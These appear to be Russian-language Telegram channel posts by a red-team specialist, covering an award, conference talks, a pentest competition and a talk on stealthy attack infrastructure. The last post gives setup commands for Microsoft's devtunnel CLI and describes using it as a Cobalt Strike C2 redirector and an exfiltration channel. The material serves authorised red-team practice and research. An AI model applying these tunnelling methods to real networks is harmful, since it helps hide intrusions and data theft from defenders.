На днях стал лауреатом премии «Киберпросвет 2024» в номинации «Фиолетовый — цвет сезона» — за популяризацию purple team!

Хотелось бы сказать большое спасибо редакции Cyber Media за организацию такой нужной и полезной деятельности, очень приятно видеть что к информационной безопасности, особенно в отношении offensive направлений в последнее время формируется правильное понимание и восприятие благодаря подобным инициативам.

Собрал ссылки на некоторые выступления и статьи на тему Red/Purple Teaming:

🟣 Код ИБ 2024 - Как использовать Red, Blue и Purple team для улучшения кибербезопасности.
https://www.youtube.com/watch?v=elT1Gx3tFfI

🟣 AM Live 2024 - Как натренировать кибербезопасность в формате Purple Teaming?
https://m.youtube.com/watch?v=VlIWUWHSC5k

🟣 AM Talk 2023 - Что такое Purple Teaming и как он помогает улучшить реальную защиту организации
https://www.youtube.com/watch?v=0h1GDworWRc

🟣 KazHackStan 2023 – Purple Teaming - Взаимодействие, а не
противодействие
https://www.youtube.com/watch?v=pHGuxHIVRE8&t=4509s

🟣 Securitylab.ru - Взаимодействие, а не противодействие: главное о Purple Teaming
https://www.securitylab.ru/analytics/537884.php

🟣 Anti-malware.ru - Purple Teaming: как проводить кибертренировку со спарринг-партнёром
https://www.anti-malware.ru/analytics/Technology_Analysis/Purple-Teaming

🟣 Anti-malware.ru - Почему смешанные кибертренировки (Purple Teaming) сегодня необходимы
https://www.anti-malware.ru/analytics/Technology_Analysis/Why-is-Purple-Teaming-necessary

🔴 PHDays 2023 – Red teaming: методики фишинговых атак
https://www.youtube.com/watch?v=7KdCbOu95Rw

🔴 The Standoff 2022 - Red team vs blue team
https://www.youtube.com/watch?v=vtE_MR5S84E&list=PL-PDZMPQHOz-GwMb0dFEziFNvHDcZAITf&index=20

🔴 Standoff Talks 2022 - Breaking Red: Приключения пентестеров на Red Team проектах
https://www.youtube.com/watch?v=ub0Q9yjKoDw

🔴 KazHackStan 2022 - Baking Red: Red Teaming infrastructure
https://www.youtube.com/watch?v=XTBpW2kCjAM&t=14196s

🔴 AM Live 2022 - Оценка защищенности в формате Red Teaming
https://www.youtube.com/watch?v=tKyPu8N4-m4

🔴 AM Live 2021 - Оценка активной защищенности (Red Teaming)
https://www.youtube.com/watch?v=DIaAW0gw9GY

Читать полностью…

Киберфестиваль Positive Hack Days 2: Итоги

Это были потрясающие 4 дня в Лужниках! По масштабу, количеству участников, треков, докладов и различных активностей в этом году Positive Hack Days превзошел любые ожидания. Поэтому в первую очередь хочется выразить слова благодарности ребятам из Positive Technologies за организацию такого грандиозного мероприятия, за ваш титанический труд сделать нашу отрасль популярной и привлечение внимания к проблемам ИБ не только профильных специалистов а самых обычных людей.
Это очень круто, респект Positive Technologies❤️

Из личных итогов:
✅ Встретил огромное количество хороших друзей и знакомых, познакомился с новыми интересными людьми! Спасибо всем кто подходил после выступлений задать вопрос или просто поздороваться❤️
✅ Принял участие в дискуссии - Как защитить основной канал бизнес-коммуникаций
✅ Выступил с докладом - Trust no one: Red Teaming инфраструктура на стероидах
✅ Послушал крутые доклады коллег (об этом расскажу в следующих постах)
✅ Сфоткался с Лукацким😎
✅ Отлично провел время🎉

С нетерпением жду Positive Hack Days в следующем году🤩

Читать полностью…

Ежегодная независимая премия для пентестеров — Pentest award возвращается!

Раз в году у этичных хакеров появляется шанс громко заявить о своих достижениях, показать свой вклад в развитие российского рынка ИБ и обменяться лучшими историями из практики на церемонии награждения Pentest award.

В этот раз вас ждут 6 номинаций, по три призовых места в каждой:

— Пробив WEB 🆕
— Пробив инфраструктуры🆕
— Девайс 🆕
— Hack the logic
— Раз bypass, два bypass
— Ловись рыбка

Главный приз — тяжеленная стеклянная именная статуэтка за первое место. Не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также бесценные подарки от партнеров проекта.

В этом году принимаю участие в составе жюри, ждем ваши заявки - https://award.awillix.ru/

Читать полностью…

В этом году на Positive Hack Days Fest 2 выступаю с докладом Trust no one: Red Teaming инфраструктура на стероидах

Многие современные компании успешно реализуют концепции Zero Trust и BeyondCorp относительно сегментирования сетей, управления и контроля доступов в соответствии с принципами наименьших привилегий для уменьшения поверхности потенциальных атак. Но к сожалению злоумышленники тоже стараются следовать модным трендам в дизайне архитектуры своей атакующей инфраструктуры и подходах к разработке и распространению вредоносного ПО. Также используют подходы к автоматизированному анализу украденных данных с использованием ML алгоритмов и постоянно совершенствуют способы сокрытия взаимодействия имплантов с серверами управления. В этой бесконечной игре в кошки-мышки для любой зрелой компании крайне важно быть готовыми к противостоянию с атакующими, которые используют подобные методы.

В докладе речь пойдет о создании архитектуры и администрированию инфраструктуры для проведения тестирований на проникновение в формате Red Teaming в соответствии с лучшими практиками Zero Trust, инструментах автоматизации Malware development и развертыванию атакующей инфраструктуры в лучших традициях DevOps. Мы поговорим о способах обеспечения максимально скрытной коммуникации с С2 серверами атакующих для противодействия обнаружению.
Познакомимся с инструментами для структурирования и автоматизированной аналитики полученных в ходе тестирования данных в разрезе возможностей их обогащения и использования для развития дальнейших атак.

Таким образом, на основе результатов подобного Red Teaming тестирования оценивается возможность противостоять продвинутым злоумышленникам и формируются рекомендации и актуальные способы своевременного обнаружения и противодействия группировкам использующим в своем арсенале подобные технологии.

Увидимся на PHDays Fest 2 🎉🎉🎉

Читать полностью…

Несколько месяцев назад на нашем канале была заметка про то, Как превратить VS Code в reverse shell
Там под капотом используется dev tunnels, и теперь это еще отдельный сервис от Microsoft в public preview, который позволяет строить туннели c использованием reverse proxy на саб-домене devtunnels.ms, который принадлежит Microsoft. Таким образом, получается хорошая альтернатива ngrok и прочим подобным сервисам😎

🔴 Скачивается подписанный бинарь под Windows, Linux и MacOS, запуск которого не требует привилегий

wget https://aka.ms/TunnelsCliDownload/linux-x64; mv linux-x64 devtunnel; chmod +x devtunnel

🔴 Необходимо аутентифицироваться с помощью Github Device Code Authentication аналогичным образом как при использовании VS Code tunnel

devtunnel user login -g -d

🔴 Создается анонимный или поддерживающий аутентификацию по JWT туннель

В блоге RedSiege описано как настроить Malleable C2 профиль и использовать devtunnels в качестве редиректора для Cobalt Strike, единственное немного смущает только то, что Microsoft терминирует TLS🤪 Но в качестве канала для эксфильтрации зашифрованных данных во время Red Team проектов может пригодиться😎

PS: Желаю всем удачного окончания недели и отличных праздников!

Читать полностью…